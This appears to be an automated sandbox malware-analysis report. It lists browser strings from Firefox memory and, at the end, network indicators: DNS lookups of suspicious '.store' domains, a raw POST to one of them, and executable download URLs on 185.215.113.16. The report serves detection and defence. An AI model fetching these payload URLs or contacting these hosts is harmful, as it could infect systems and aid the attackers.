Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedUPDATE moz_bookmarks SET position = position - 1 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedUPDATE moz_bookmarks SET position = position - 1 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'Should setting it as the default PDF handler only replace existing PDF handlers that are browsers, and not other PDF handlers such as Acrobat Reader or Nitro PDF.Allow the background update process to download and apply updates when the Mozilla Maintenance Service is unavailable but the installation directory can be written.moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/requestStorageAccess_helper.js[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]]handleFallbackToCompleteUpdate - install of complete or only one patch offered failed. Notifying observers. topic: update-error, status: unknown, update.patchCount: DELETE FROM moz_places WHERE id IN ( equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://track.adform.net/serving/scripts/trackpoint/*://static.chartbeat.com/js/chartbeat.jsresource://gre/modules/FileUtils.sys.mjsFileUtils_openAtomicFileOutputStreamFileUtils_openSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0https://smartblock.firefox.etp/facebook.svg*://pub.doubleverify.com/signals/pub.js**://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter@mozilla.org.xpi*://auth.9c9media.ca/auth/main.jsresource://gre/modules/addons/XPIProvider.jsm*://www.rva311.com/static/js/main.*.chunk.js*://www.google-analytics.com/analytics.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagmanager.com/gtm.js**://www.googletagservices.com/tag/js/gpt.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.moatads.com/*/moatheader.js**://www.google-analytics.com/gtm/js**://cdn.adsafeprotected.com/iasPET.1.js*://*.vidible.tv/*/vidible-min.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/advancedLinkTracking.js*://s.webtrends.com/js/webtrends.min.js*://cdn.optimizely.com/public/*.js*://s.webtrends.com/js/webtrends.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://vast.adsafeprotected.com/vast**://www.facebook.com/platform/impression.php*extensions.geckoProfiler.acceptedExtensionIds equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B79700A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: media.gmp-manager.cert.checkAttributesstartup - adding clearkey CDM failedspeculativeConnectWithOriginAttributessitepermsaddon-provider-registeredfindUpdates() - updateTask succeeded for media.gmp-manager.cert.requireBuiltInonPrefEnabledChanged() - adding gmp directory onPrefEnabledChanged() - removing gmp directory KEY_PLUGIN_LAST_INSTALL_FAIL_REASONuninstallPlugin() - unregistering gmp directory KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASONstartup - adding clearkey CDM directory media.gmp-manager.checkContentSignaturemedia.gmp-manager.secondsBetweenChecksipc:first-content-process-createdThis should only be called from XPCShell testsonPrefEMEGlobalEnabledChanged() id=SitePermsAddonInstall#cancel called twice on dom.sitepermsaddon-provider.enabledresource://gre/modules/UpdateUtils.sys.mjsaddGatedPermissionTypesForXpcShellTests*://static.criteo.net/js/ld/publishertag.jswebcompat-reporter%40mozilla.org:1.5.1*://*.imgur.com/js/vendor.*.bundle.js@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/network/safe-file-output-stream;1*://www.everestjs.net/static/st.v3.js**://static.chartbeat.com/js/chartbeat_video.js*://cdn.branch.io/branch-latest.min.js*@mozilla.org/addons/addon-manager-startup;1FileUtils_closeAtomicFileOutputStream*://*.imgur.io/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.jshttps://smartblock.firefox.etp/play.svg@mozilla.org/network/file-output-stream;1*://libs.coremetrics.com/eluminate.jsFileUtils_closeSafeFileOutputStream*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*resource://gre/modules/AddonManager.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://devtools/server/devtools-server.jsget FIXUP_FLAG_FORCE_ALTERNATE_URIreleaseDistinctSystemPrincipalLoaderdevtools.performance.popup.feature-flagUnable to start devtools server on Failed to listen. Listener already attached.Got invalid request to save JSON dataFailed to execute WebChannel callback:WebChannel/this._originCheckCallbackJSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.devtools/client/framework/devtools-browserresource://devtools/shared/security/socket.jsbrowser.urlbar.dnsResolveFullyQualifiedNames@mozilla.org/uriloader/handler-service;1devtools/client/framework/devtools^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)browser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=defaultDevTools telemetry entry point failed: devtools.debugger.remote-websocketDevToolsStartup.jsm:handleDebuggerFlag@mozilla.org/dom/slow-script-debug;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}No callback set for this channel.@mozilla.org/network/protocol;1?name=fileresource://gre/modules/ExtHandlerService.sys.mjshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol<http://poczta.interia.pl/mh/?mailto=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/network/async-stream-copier;1https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this typehttps://mail.inbox.lv/compose?to=%sScheme should be either http or httpsresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs_injectDefaultProtocolHandlersIfNeeded@mozilla.org/network/file-input-stream;1extension/default-theme@mozilla.org/extendedData@mozilla.org/uriloader/local-handler-app;1Can't invoke URIFixup in the content processresource://gre/modules/JSONFile.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/simple-stream-listener;1@mozilla.org/scriptableinputstream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst argument should be an nsIInputStreampdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/network/input-stream-pump;1https://mail.yandex.ru/compose?mailto=%snewChannel requires a single object argumentNon-zero amount of bytes must be specifiedhttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/handler-service;1resource://gre/modules/Integration.sys.mjsMust have a source and a callback
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: dualstack.reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 0000001B.00000002.2764741953.000001C17457D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/:
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe?
